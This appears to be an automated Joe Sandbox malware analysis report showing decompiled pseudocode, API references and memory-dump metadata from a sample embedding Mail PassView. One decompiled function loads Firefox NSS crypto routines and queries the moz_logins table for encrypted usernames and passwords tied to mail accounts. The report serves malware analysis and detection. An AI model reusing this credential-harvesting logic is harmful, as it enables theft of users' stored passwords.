                                                                                                                                                    0x0040e591
                                                                                                                                                    0x0040e629
                                                                                                                                                    0x0040e62c
                                                                                                                                                    0x0040e638
                                                                                                                                                    0x0040e746
                                                                                                                                                    0x0040e74b
                                                                                                                                                    0x0040e757
                                                                                                                                                    0x0040e75b
                                                                                                                                                    0x0040e769
                                                                                                                                                    0x0040e780
                                                                                                                                                    0x0040e78a
                                                                                                                                                    0x0040e7d0
                                                                                                                                                    0x0040e7da
                                                                                                                                                    0x0040e819
                                                                                                                                                    0x0040e819
                                                                                                                                                    0x0040e649
                                                                                                                                                    0x0040e65a
                                                                                                                                                    0x0040e65e
                                                                                                                                                    0x0040e662
                                                                                                                                                    0x0040e66a
                                                                                                                                                    0x0040e69c
                                                                                                                                                    0x0040e6cc
                                                                                                                                                    0x0040e6e3
                                                                                                                                                    0x0040e6e8
                                                                                                                                                    0x0040e6f7
                                                                                                                                                    0x0040e715
                                                                                                                                                    0x0040e726
                                                                                                                                                    0x0040e72b
                                                                                                                                                    0x0040e72f
                                                                                                                                                    0x0040e73a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040e662
                                                                                                                                                    0x0040e59a
                                                                                                                                                    0x0040e59c
                                                                                                                                                    0x0040e5a6
                                                                                                                                                    0x0040e5aa
                                                                                                                                                    0x0040e610
                                                                                                                                                    0x0040e614
                                                                                                                                                    0x0040e619
                                                                                                                                                    0x0040e61d
                                                                                                                                                    0x0040e621
                                                                                                                                                    0x0040e623
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040e623
                                                                                                                                                    0x0040e5b3
                                                                                                                                                    0x0040e5b7
                                                                                                                                                    0x0040e5de
                                                                                                                                                    0x0040e5e7
                                                                                                                                                    0x0040e5ee
                                                                                                                                                    0x0040e5f0
                                                                                                                                                    0x0040e5f0
                                                                                                                                                    0x0040e5ee
                                                                                                                                                    0x0040e5f4
                                                                                                                                                    0x0040e5ff
                                                                                                                                                    0x0040e604
                                                                                                                                                    0x0040e60c
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                                                                    • API String ID: 1703216249-3046471546
                                                                                                                                                    • Opcode ID: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
                                                                                                                                                    • Instruction ID: 2f6da9a5868e125b8128a3bf626dfa5428397bb468519cd7ccc35e9b597c58da
                                                                                                                                                    • Opcode Fuzzy Hash: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
                                                                                                                                                    • Instruction Fuzzy Hash: C9B1DE71108341AFD710DFA8C985A6BBBE9FF88704F008A2DF699D2260D775E814CF16
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004010E5 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 176COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                    			E004010E5(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t62;
				void* _t67;
				struct HWND__* _t68;
				struct HWND__* _t69;
				void* _t72;
				unsigned int _t73;
				struct HWND__* _t75;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				unsigned int _t83;
				struct HWND__* _t85;
				struct HWND__* _t87;
				struct HWND__* _t88;
				struct tagPOINT _t94;
				struct tagPOINT _t96;
				void* _t102;
				void* _t113;

				_t102 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t113 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x417348;
					if(__eflags != 0) {
						SetDlgItemTextA( *(__ecx + 4), 0x3ee, 0x417348);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 4), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t113 + 4), 0x3ee), 0);
					}
					SetWindowTextA( *(_t113 + 4), "Mail PassView");
					SetDlgItemTextA( *(_t113 + 4), 0x3ea, _t113 + 0xc);
					SetDlgItemTextA( *(_t113 + 4), 0x3ec, _t113 + 0x10b);
					E00401085(_t113, __eflags);
					E00406491(_t102,  *(_t113 + 4));
					goto L29;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t62 = _a8;
						__eflags = _t62 - 1;
						if(_t62 != 1) {
							goto L29;
						} else {
							__eflags = _t62 >> 0x10;
							if(_t62 >> 0x10 != 0) {
								goto L29;
							} else {
								EndDialog( *(__ecx + 4), 1);
								DeleteObject( *(_t113 + 0x20c));
								goto L8;
							}
						}
					} else {
						_t67 = _t61 - 0x27;
						if(_t67 == 0) {
							_t68 = GetDlgItem( *(__ecx + 4), 0x3ec);
							__eflags = _a12 - _t68;
							if(_a12 != _t68) {
								__eflags =  *0x417388;
								if( *0x417388 == 0) {
									goto L29;
								} else {
									_t69 = GetDlgItem( *(_t113 + 4), 0x3ee);
									__eflags = _a12 - _t69;
									if(_a12 != _t69) {
										goto L29;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t72 = _t67 - 0xc8;
							if(_t72 == 0) {
								_t73 = _a12;
								_t94 = _t73 & 0x0000ffff;
								_v12.x = _t94;
								_v12.y = _t73 >> 0x10;
								_t75 = GetDlgItem( *(__ecx + 4), 0x3ec);
								_push(_v12.y);
								_a8 = _t75;
								_t76 = ChildWindowFromPoint( *(_t113 + 4), _t94);
								__eflags = _t76 - _a8;
								if(_t76 != _a8) {
									__eflags =  *0x417388;
									if( *0x417388 == 0) {
										goto L29;
									} else {
										_t77 = GetDlgItem( *(_t113 + 4), 0x3ee);
										_push(_v12.y);
										_t78 = ChildWindowFromPoint( *(_t113 + 4), _v12.x);
										__eflags = _t78 - _t77;
										if(_t78 != _t77) {
											goto L29;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorA( *0x416b94, 0x67));
									goto L8;
								}
							} else {
								if(_t72 != 0) {
									L29:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t83 = _a12;
									_t96 = _t83 & 0x0000ffff;
									_v12.x = _t96;
									_v12.y = _t83 >> 0x10;
									_t85 = GetDlgItem( *(__ecx + 4), 0x3ec);
									_push(_v12.y);
									_a8 = _t85;
									if(ChildWindowFromPoint( *(_t113 + 4), _t96) != _a8) {
										__eflags =  *0x417388;
										if( *0x417388 == 0) {
											goto L29;
										} else {
											_t87 = GetDlgItem( *(_t113 + 4), 0x3ee);
											_push(_v12.y);
											_t88 = ChildWindowFromPoint( *(_t113 + 4), _v12);
											__eflags = _t88 - _t87;
											if(_t88 != _t87) {
												goto L29;
											} else {
												_push(0x417388);
												goto L7;
											}
										}
									} else {
										_push(_t113 + 0x10b);
										L7:
										_push( *(_t113 + 4));
										E00406523();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}


























                                                                                                                                                    0x004010e5
                                                                                                                                                    0x004010e8
                                                                                                                                                    0x004010e9
                                                                                                                                                    0x004010ed
                                                                                                                                                    0x004010f5
                                                                                                                                                    0x004010f7
                                                                                                                                                    0x004012b2
                                                                                                                                                    0x004012b9
                                                                                                                                                    0x004012f4
                                                                                                                                                    0x004012bb
                                                                                                                                                    0x004012d4
                                                                                                                                                    0x004012e3
                                                                                                                                                    0x004012e3
                                                                                                                                                    0x00401302
                                                                                                                                                    0x0040131a
                                                                                                                                                    0x0040132b
                                                                                                                                                    0x0040132d
                                                                                                                                                    0x00401335
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004010fd
                                                                                                                                                    0x004010fd
                                                                                                                                                    0x004010fe
                                                                                                                                                    0x0040127d
                                                                                                                                                    0x00401280
                                                                                                                                                    0x00401284
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040128a
                                                                                                                                                    0x0040128d
                                                                                                                                                    0x00401290
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401296
                                                                                                                                                    0x0040129b
                                                                                                                                                    0x004012a7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004012a7
                                                                                                                                                    0x00401290
                                                                                                                                                    0x00401104
                                                                                                                                                    0x00401104
                                                                                                                                                    0x00401107
                                                                                                                                                    0x0040122e
                                                                                                                                                    0x00401230
                                                                                                                                                    0x00401233
                                                                                                                                                    0x0040125b
                                                                                                                                                    0x00401262
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401268
                                                                                                                                                    0x00401270
                                                                                                                                                    0x00401272
                                                                                                                                                    0x00401275
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040127b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040127b
                                                                                                                                                    0x00401275
                                                                                                                                                    0x00401235
                                                                                                                                                    0x00401235
                                                                                                                                                    0x0040123a
                                                                                                                                                    0x00401248
                                                                                                                                                    0x00401250
                                                                                                                                                    0x00401250
                                                                                                                                                    0x0040110d
                                                                                                                                                    0x0040110d
                                                                                                                                                    0x00401112
                                                                                                                                                    0x004011a2
                                                                                                                                                    0x004011ab
                                                                                                                                                    0x004011b9
                                                                                                                                                    0x004011bc
                                                                                                                                                    0x004011bf
                                                                                                                                                    0x004011c1
                                                                                                                                                    0x004011c4
                                                                                                                                                    0x004011d1
                                                                                                                                                    0x004011d3
                                                                                                                                                    0x004011d6
                                                                                                                                                    0x004011f2
                                                                                                                                                    0x004011f9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004011ff
                                                                                                                                                    0x00401207
                                                                                                                                                    0x00401209
                                                                                                                                                    0x00401214
                                                                                                                                                    0x00401216
                                                                                                                                                    0x00401218
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040121e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040121e
                                                                                                                                                    0x00401218
                                                                                                                                                    0x004011d8
                                                                                                                                                    0x004011d8
                                                                                                                                                    0x004011e7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004011e7
                                                                                                                                                    0x00401118
                                                                                                                                                    0x0040111a
                                                                                                                                                    0x0040133b
                                                                                                                                                    0x0040133b
                                                                                                                                                    0x0040133b
                                                                                                                                                    0x00401120
                                                                                                                                                    0x00401120
                                                                                                                                                    0x00401129
                                                                                                                                                    0x00401137
                                                                                                                                                    0x0040113a
                                                                                                                                                    0x0040113d
                                                                                                                                                    0x0040113f
                                                                                                                                                    0x00401142
                                                                                                                                                    0x00401154
                                                                                                                                                    0x0040116f
                                                                                                                                                    0x00401176
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040117c
                                                                                                                                                    0x00401184
                                                                                                                                                    0x00401186
                                                                                                                                                    0x00401191
                                                                                                                                                    0x00401193
                                                                                                                                                    0x00401195
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040119b
                                                                                                                                                    0x0040119b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040119b
                                                                                                                                                    0x00401195
                                                                                                                                                    0x00401156
                                                                                                                                                    0x0040115c
                                                                                                                                                    0x0040115d
                                                                                                                                                    0x0040115d
                                                                                                                                                    0x00401160
                                                                                                                                                    0x00401167
                                                                                                                                                    0x00401169
                                                                                                                                                    0x00401169
                                                                                                                                                    0x00401154
                                                                                                                                                    0x0040111a
                                                                                                                                                    0x00401112
                                                                                                                                                    0x00401107
                                                                                                                                                    0x004010fe
                                                                                                                                                    0x00401341

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObject
                                                                                                                                                    • String ID: Mail PassView
                                                                                                                                                    • API String ID: 3628558512-272225179
                                                                                                                                                    • Opcode ID: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
                                                                                                                                                    • Instruction ID: a5e01e197ecdabf9e6bdb75eaf1794657044b10619e6b9182d208ef804a260cb
                                                                                                                                                    • Opcode Fuzzy Hash: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
                                                                                                                                                    • Instruction Fuzzy Hash: 68518130044248BFEB259F60DE85EAE7BB5EB04700F10853AFA56E65F0C7759D61EB08
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040CE28 Relevance: 42.3, APIs: 21, Strings: 3, Instructions: 311stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                                    			E0040CE28(void* __ecx, void* __eflags, intOrPtr _a4, char* _a8) {
				char* _v8;
				int _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				int* _v28;
				char* _v32;
				int _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				void _v331;
				int _v332;
				void _v587;
				int _v588;
				void _v851;
				char _v852;
				void _v1378;
				short _v1380;
				void _v1995;
				char _v1996;
				void _v2611;
				char _v2612;
				char _v3636;
				char _v4660;
				char _v5684;
				char _v6708;
				char _v7732;
				void _v8755;
				char _v8756;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t115;
				signed int _t116;
				int _t118;
				void* _t130;
				char* _t170;
				intOrPtr _t175;
				char* _t177;
				int _t196;
				intOrPtr _t226;
				void* _t229;
				int* _t232;
				char* _t235;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t240;

				E004118A0(0x2234, __ecx);
				_t226 = _a4;
				_t232 = _t226 + 0x30;
				_v28 = _t232;
				_t115 = E0040DEEE(_t232, _t226 + 0x362);
				if(_t115 == 0) {
					L43:
					return _t115;
				}
				_t116 = _t232[1];
				_t196 = 0;
				if(_t116 == 0) {
					_t115 = _t116 | 0xffffffff;
				} else {
					_t115 =  *_t116(_t226 + 0x158);
				}
				if(_t115 != _t196) {
					L41:
					if( *_t232 == _t196) {
						goto L43;
					}
					_t118 = SetCurrentDirectoryA( &(_t232[8]));
					 *_t232 = _t196;
					return _t118;
				} else {
					_v36 = _t196;
					if(E0040F64B( &_v72, _t226 + 0x362) == 0) {
						L39:
						_t232 = _v28;
						_t115 = _t232[2];
						if(_t115 != _t196) {
							_t115 =  *_t115();
						}
						goto L41;
					} else {
						_v12 = _t196;
						_v1380 = _t196;
						memset( &_v1378, _t196, 0x208);
						_v852 = _t196;
						memset( &_v851, _t196, 0x104);
						_t239 = _t238 + 0x18;
						MultiByteToWideChar(_t196, _t196, _a8, 0xffffffff,  &_v1380, 0x104);
						WideCharToMultiByte(0xfde9, _t196,  &_v1380, 0xffffffff,  &_v852, 0x104, _t196, _t196);
						if(_v72 != _t196) {
							_v72( &_v852,  &_v12);
						}
						if(_v12 == _t196) {
							goto L39;
						}
						_a8 = _t196;
						if(_v68 != _t196) {
							_v68(_v12, "SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins", 0xffffffff,  &_a8,  &_v76);
							_t239 = _t239 + 0x14;
						}
						L11:
						L11:
						if(_v64 == _t196) {
							_t130 = 0xffff;
						} else {
							_t130 = _v64(_a8);
						}
						if(_t130 != 0x64) {
							goto L34;
						}
						_v8756 = _t196;
						memset( &_v8755, _t196, 0x3ff);
						memset( &_v7732, _t196, 0x1400);
						_t240 = _t239 + 0x18;
						_t235 = E0040F7EE( &_v72, _a8, 1);
						_v20 = E0040F7EE( &_v72, _a8, 6);
						_v8 = E0040F7EE( &_v72, _a8, 7);
						_v24 = E0040F7EE( &_v72, _a8, 4);
						_v32 = E0040F7EE( &_v72, _a8, 5);
						_v16 = E0040F7EE( &_v72, _a8, 2);
						if(_t235 != _t196) {
							strcpy( &_v8756, _t235);
						}
						if(_v20 != _t196) {
							strcpy( &_v7732, _v20);
						}
						if(_v8 != _t196) {
							strcpy( &_v6708, _v8);
						}
						if(_v24 != _t196) {
							strcpy( &_v5684, _v24);
						}
						if(_v32 != _t196) {
							strcpy( &_v4660, _v32);
						}
						if(_v16 != _t196) {
							strcpy( &_v3636, _v16);
						}
						_v332 = _t196;
						memset( &_v331, _t196, 0xff);
						_v588 = _t196;
						memset( &_v587, _t196, 0xff);
						_t239 = _t240 + 0x18;
						E0040CD27(_v8, _t226,  &_v588);
						E0040CD27(_v20, _t226,  &_v332);
						_v8 = _t196;
						if( *((intOrPtr*)(_t226 + 0x474)) > _t196) {
							_v16 = _t226 + 0x468;
							do {
								_t237 = E0040D438(_v8, _v16);
								_v2612 = _t196;
								memset( &_v2611, _t196, 0x261);
								_v1996 = _t196;
								memset( &_v1995, _t196, 0x261);
								_t86 = _t237 + 0x104; // 0x104
								_t229 = _t86;
								sprintf( &_v2612, "mailbox://%s", _t229);
								sprintf( &_v1996, "imap://%s", _t229);
								_push( &_v3636);
								_t170 =  &_v2612;
								_push(_t170);
								L004115B2();
								_t239 = _t239 + 0x38;
								if(_t170 == 0) {
									L31:
									_t94 = _t237 + 0x304; // 0x304
									E004060D0(0xff, _t94,  &_v588);
									_t96 = _t237 + 0x204; // 0x204
									E004060D0(0xff, _t96,  &_v332);
									_t196 = 0;
									goto L32;
								}
								_push( &_v3636);
								_t177 =  &_v1996;
								_push(_t177);
								L004115B2();
								if(_t177 != 0) {
									goto L32;
								}
								goto L31;
								L32:
								_v8 =  &(_v8[1]);
								_t175 = _a4;
							} while (_v8 <  *((intOrPtr*)(_t175 + 0x474)));
							_t226 = _t175;
						}
						goto L11;
						L34:
						if(_a8 != _t196 && _v48 != _t196) {
							_v48(_a8);
						}
						if(_v44 != _t196) {
							_v44(_v12);
						}
						goto L39;
					}
				}
			}























































                                                                                                                                                    0x0040ce30
                                                                                                                                                    0x0040ce38
                                                                                                                                                    0x0040ce41
                                                                                                                                                    0x0040ce45
                                                                                                                                                    0x0040ce48
                                                                                                                                                    0x0040ce4f
                                                                                                                                                    0x0040d1e9
                                                                                                                                                    0x0040d1e9
                                                                                                                                                    0x0040d1e9
                                                                                                                                                    0x0040ce55
                                                                                                                                                    0x0040ce58
                                                                                                                                                    0x0040ce5c
                                                                                                                                                    0x0040ce6a
                                                                                                                                                    0x0040ce5e
                                                                                                                                                    0x0040ce65
                                                                                                                                                    0x0040ce67
                                                                                                                                                    0x0040ce6f
                                                                                                                                                    0x0040d1d5
                                                                                                                                                    0x0040d1d7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d1dd
                                                                                                                                                    0x0040d1e3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040ce75
                                                                                                                                                    0x0040ce7f
                                                                                                                                                    0x0040ce89
                                                                                                                                                    0x0040d1c9
                                                                                                                                                    0x0040d1c9
                                                                                                                                                    0x0040d1cc
                                                                                                                                                    0x0040d1d1
                                                                                                                                                    0x0040d1d3
                                                                                                                                                    0x0040d1d3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040ce8f
                                                                                                                                                    0x0040ce9c
                                                                                                                                                    0x0040ce9f
                                                                                                                                                    0x0040cea6
                                                                                                                                                    0x0040ceb9
                                                                                                                                                    0x0040cebf
                                                                                                                                                    0x0040cec4
                                                                                                                                                    0x0040ced6
                                                                                                                                                    0x0040cef5
                                                                                                                                                    0x0040cefe
                                                                                                                                                    0x0040cf0b
                                                                                                                                                    0x0040cf0f
                                                                                                                                                    0x0040cf13
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040cf1c
                                                                                                                                                    0x0040cf1f
                                                                                                                                                    0x0040cf33
                                                                                                                                                    0x0040cf36
                                                                                                                                                    0x0040cf36
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040cf39
                                                                                                                                                    0x0040cf3c
                                                                                                                                                    0x0040cf47
                                                                                                                                                    0x0040cf3e
                                                                                                                                                    0x0040cf41
                                                                                                                                                    0x0040cf44
                                                                                                                                                    0x0040cf4f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040cf62
                                                                                                                                                    0x0040cf68
                                                                                                                                                    0x0040cf7a
                                                                                                                                                    0x0040cf7f
                                                                                                                                                    0x0040cf94
                                                                                                                                                    0x0040cfa3
                                                                                                                                                    0x0040cfb3
                                                                                                                                                    0x0040cfc3
                                                                                                                                                    0x0040cfd3
                                                                                                                                                    0x0040cfe0
                                                                                                                                                    0x0040cfe3
                                                                                                                                                    0x0040cfed
                                                                                                                                                    0x0040cff3
                                                                                                                                                    0x0040cff7
                                                                                                                                                    0x0040d003
                                                                                                                                                    0x0040d009
                                                                                                                                                    0x0040d00d
                                                                                                                                                    0x0040d019
                                                                                                                                                    0x0040d01f
                                                                                                                                                    0x0040d023
                                                                                                                                                    0x0040d02f
                                                                                                                                                    0x0040d035
                                                                                                                                                    0x0040d039
                                                                                                                                                    0x0040d045
                                                                                                                                                    0x0040d04b
                                                                                                                                                    0x0040d04f
                                                                                                                                                    0x0040d05b
                                                                                                                                                    0x0040d061
                                                                                                                                                    0x0040d070
                                                                                                                                                    0x0040d076
                                                                                                                                                    0x0040d084
                                                                                                                                                    0x0040d08a
                                                                                                                                                    0x0040d08f
                                                                                                                                                    0x0040d09e
                                                                                                                                                    0x0040d0af
                                                                                                                                                    0x0040d0ba
                                                                                                                                                    0x0040d0bd
                                                                                                                                                    0x0040d0c9
                                                                                                                                                    0x0040d0cc
                                                                                                                                                    0x0040d0dd
                                                                                                                                                    0x0040d0e7
                                                                                                                                                    0x0040d0ed
                                                                                                                                                    0x0040d0fb
                                                                                                                                                    0x0040d101
                                                                                                                                                    0x0040d106
                                                                                                                                                    0x0040d106
                                                                                                                                                    0x0040d119
                                                                                                                                                    0x0040d12b
                                                                                                                                                    0x0040d136
                                                                                                                                                    0x0040d137
                                                                                                                                                    0x0040d13d
                                                                                                                                                    0x0040d13e
                                                                                                                                                    0x0040d143
                                                                                                                                                    0x0040d148
                                                                                                                                                    0x0040d163
                                                                                                                                                    0x0040d16a
                                                                                                                                                    0x0040d175
                                                                                                                                                    0x0040d181
                                                                                                                                                    0x0040d187
                                                                                                                                                    0x0040d18e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d18e
                                                                                                                                                    0x0040d150
                                                                                                                                                    0x0040d151
                                                                                                                                                    0x0040d157
                                                                                                                                                    0x0040d158
                                                                                                                                                    0x0040d161
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d190
                                                                                                                                                    0x0040d190
                                                                                                                                                    0x0040d193
                                                                                                                                                    0x0040d199
                                                                                                                                                    0x0040d1a5
                                                                                                                                                    0x0040d1a5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d1ac
                                                                                                                                                    0x0040d1af
                                                                                                                                                    0x0040d1b9
                                                                                                                                                    0x0040d1bc
                                                                                                                                                    0x0040d1c0
                                                                                                                                                    0x0040d1c5
                                                                                                                                                    0x0040d1c8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d1c0
                                                                                                                                                    0x0040ce89

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF0F
                                                                                                                                                      • Part of subcall function 0040DEEE: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
                                                                                                                                                      • Part of subcall function 0040DEEE: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
                                                                                                                                                      • Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF62
                                                                                                                                                      • Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF6C
                                                                                                                                                      • Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF7A
                                                                                                                                                      • Part of subcall function 0040DEEE: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
                                                                                                                                                      • Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
                                                                                                                                                      • Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
                                                                                                                                                      • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
                                                                                                                                                      • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
                                                                                                                                                      • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
                                                                                                                                                      • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
                                                                                                                                                      • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
                                                                                                                                                      • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
                                                                                                                                                    • memset.MSVCRT ref: 0040CEA6
                                                                                                                                                    • memset.MSVCRT ref: 0040CEBF
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,0040D314,000000FF,?,00000104,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CED6
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CEF5
                                                                                                                                                    • memset.MSVCRT ref: 0040CF68
                                                                                                                                                    • memset.MSVCRT ref: 0040CF7A
                                                                                                                                                    • strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040CFED
                                                                                                                                                    • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D003
                                                                                                                                                    • strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D019
                                                                                                                                                    • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D02F
                                                                                                                                                    • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D045
                                                                                                                                                    • strcpy.MSVCRT(?,0040D314,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D05B
                                                                                                                                                    • memset.MSVCRT ref: 0040D076
                                                                                                                                                    • memset.MSVCRT ref: 0040D08A
                                                                                                                                                    • memset.MSVCRT ref: 0040D0ED
                                                                                                                                                    • memset.MSVCRT ref: 0040D101
                                                                                                                                                    • sprintf.MSVCRT ref: 0040D119
                                                                                                                                                    • sprintf.MSVCRT ref: 0040D12B
                                                                                                                                                    • _stricmp.MSVCRT(?,?,?,imap://%s,00000104,?,mailbox://%s,00000104,?,00000000,00000261,?,00000000,00000261,?,?), ref: 0040D13E
                                                                                                                                                    • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040D158
                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?,?,?,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040D1DD
                                                                                                                                                    Strings
                                                                                                                                                    • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 0040CF2B
                                                                                                                                                    • mailbox://%s, xrefs: 0040D113
                                                                                                                                                    • imap://%s, xrefs: 0040D125
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$AddressProcstrcpy$CurrentDirectory$ByteCharLibraryLoadMultiWide_stricmpsprintfstrlen$HandleModule
